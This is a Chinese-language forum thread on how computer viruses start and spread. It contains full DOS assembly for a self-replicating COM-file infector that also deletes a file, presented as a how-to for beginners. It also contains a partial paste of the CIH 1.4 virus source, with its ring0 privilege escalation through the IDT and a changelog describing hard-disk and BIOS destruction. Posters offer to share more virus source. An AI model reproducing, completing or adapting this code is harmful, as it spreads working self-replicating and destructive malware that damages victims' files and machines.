有关病毒的运行方式，高手请进！

新欢乐是感染文件夹下的Folder.htt文件，在资源管理器中打开时会读取Folder.htt以Web页方式显示文件夹，所以便会被执行。
而开机启动的方法多种多样，可不止添加启动项一种呦^^

注入进程方式也可以让机器感染，比如我注入一个病毒进程到Explorer.exe进程中，那么每次系统重新启动，病毒就会开始运行（其实病毒一般不用这种方法，木马才会使用这种方法）病毒一般就是感染一种或多种类型的文件！

也有的感染exe，我就写了一个，就是在exe运行的时候跟踪它，然后改写，把我的程序加在它前面

注册表
WIN。INI
SYSTEM。INI
文件关联

病毒的编写是一种高深技术，真正的病毒一般都具有：传染性、隐藏性（又称潜伏性）、破坏性。现在的病毒种类也不少，如平常的传染可执行文件的病毒、宏病毒等等。但原始的、破坏性最大的病毒还是传染可执行文件的病毒（像CIH病毒），而这些病毒一般都是用汇编语言编写的。有许多人对病毒有着好奇和向往，但是往往又因为汇编语言的难学等问题望而却步。这里教给大家如何制作一个简单的程序，这个程序虽然算不上病毒但是具有病毒的传染性，而往往病毒的传染性是平常人最难做到的。好啦，现在转入正题，先讲讲病毒是如何传染的，传染后又如何在被染的文件中执行的，其实道理非常简单：病毒一般将其代码写入执行文件的尾部，然后使执行文件在执行时先执行文件尾部的病毒代码，然后再跳回原代码处执行。现在举一个试例进行说明： ;-----------------------------------------
;功能：感染当前文件夹的test.com文件
; 并删除当前文件夹的del.txt文件
; 显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何？？？不难吧。
-------------------------------------------------------------------------------
COM文件执行时将COM文件内所的所有内容COPY到内存，起始地址是100，然后进行执行
没有任何有关节啦、段啦这些属性，所以COM文件病毒是最简单最简单的病毒。

CIH 1.4版源代码：
; ****************************************************************************
; *                     The Virus Program Information                        *
; ****************************************************************************
; *                                                                          *
; *     Designer : CIH                  Source : TTIT of TATUNG in Taiwan    *
; *     Create Date : 04/26/1998        Now Version : 1.4                    *
; *     Modification Time : 05/31/1998                                       *
; *                                                                          *
; *     Turbo Assembler Version 4.0     : tasm /m cih                        *
; *     Turbo Link Version 3.01         : tlink /3 /t cih, cih.exe           *
; *                                                                          *
; *==========================================================================*
; *                     Modification History                                 *
; *==========================================================================*
; *     v1.0    1. Create the Virus Program.                                 *
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *             6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *             7. It is also Infected, even the File is Read-Only.          *
; *             8. When the File is Infected, the Modification Date and Time *
; *                of the File also don't be Changed.                        *
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *                Previous FileSystemApiHook, it will Call the Function     *
; *                that the IFS Manager Would Normally Call to Implement     *
; *                this Particular I/O Request.                              *
; *            10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; *     v1.1    1. Especially, the File that be Infected will not Increase   *
; *                it's Size...   ^__^                                       *
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *
; *                When Exception Error Occurs, Our OS System should be in   *
; *                Windows NT. So My Cute Virus will not Continue to Run,    *
; *                it will Jmup to Original Application to Run.              *
; *             3. Use Better Algorithm, Reduce Virus Code Size.             *
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *
; *==========================================================================*
; *     v1.2    1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *             2. Modify the Bug of v1.1                                    *
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *
; *==========================================================================*
; *     v1.3    1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *
; *==========================================================================*
; *     v1.4    1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *             2. Change the Date of Killing Computers.                     *
; * 05/31/1998  3. Modify Virus Version Copyright.                           *
; *             4. The Virus "Basic" Size is 1019 Bytes.                     *
; ****************************************************************************

                .586P

; ****************************************************************************
; *             Original PE Executable File(Don't Modify this Section)       *
; ****************************************************************************

OriginalAppEXE  SEGMENT

FileHeader:
                db      04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
                db      0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
                db      00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
                db      021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
                db      069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
                db      061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
                db      074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
                db      020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
                db      06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
                db      024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
                db      0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
                db      00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
                db      000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
                db      000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
                db      000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                db      0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
                dd      00000000h, VirusSize

                        lea     ecx, StopToRunVirusCode-@0[ebx]
                        push    ecx

                        push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************

                        push    eax             ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;

                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0

                        cli

                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point

                        lea     esi, MyExceptionHook-@1[ecx]

                        push    esi

                        mov     [ebx-04h], si           ;
                        shr     esi, 16                 ; Modify Exception
                        mov     [ebx+02h], si           ; Entry Point Address

                        pop     esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************

                        int     HookExceptionNumber     ; GenerateException
ReturnAddressOfEndException     =       $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

; *************************************
; * Generate Exception Again          *
; *************************************

                        int     HookExceptionNumber     ; GenerateException Aga


; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************

ReadyRestoreSE:
                        sti

                        xor     ebx, ebx

                        jmp     RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************

StopToRunVirusCode:
@1                      =       StopToRunVirusCode

                        xor     ebx, ebx
                        mov     eax, fs:[ebx]
                        mov     esp, [eax]

RestoreSE:
                        pop     dword ptr fs:[ebx]
                        pop     eax

; *************************************
; * Return Original App to Execute    *
; *************************************

                        pop     ebp

                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack

                        ret     ; Return to Original App Entry Point

; *********************************************************
; *             Ring0 Virus Game Initial Program          *
; *********************************************************

MyExceptionHook:
@2                      =       MyExceptionHook

                        jz      InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************

                        mov     ecx, dr0
                        jecxz   AllocateSystemMemoryPage

                        add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOf
dException

最好那位给个Delphi编写的代码
ASM等的看都麻烦/ by LY http://lysoft.7u7.net http://liuyang.7i24.com http://lysoft.91i.net

楼上的，
能不能，发给我一份是源代码的
[email protected]

己将CIH1.4源码传到测试页面 gokuku.yeah.net要的取,还需要什么病毒吗?

病毒程序在设计的时候就设置在系统启动时自动放入内存~~~要看是什么平台的病毒了~~~
我一直是研究DOS下的病毒的~~因为学校的机子太老啊,没有办法~

调试易

有关病毒的运行方式，高手请进！

解决方案 »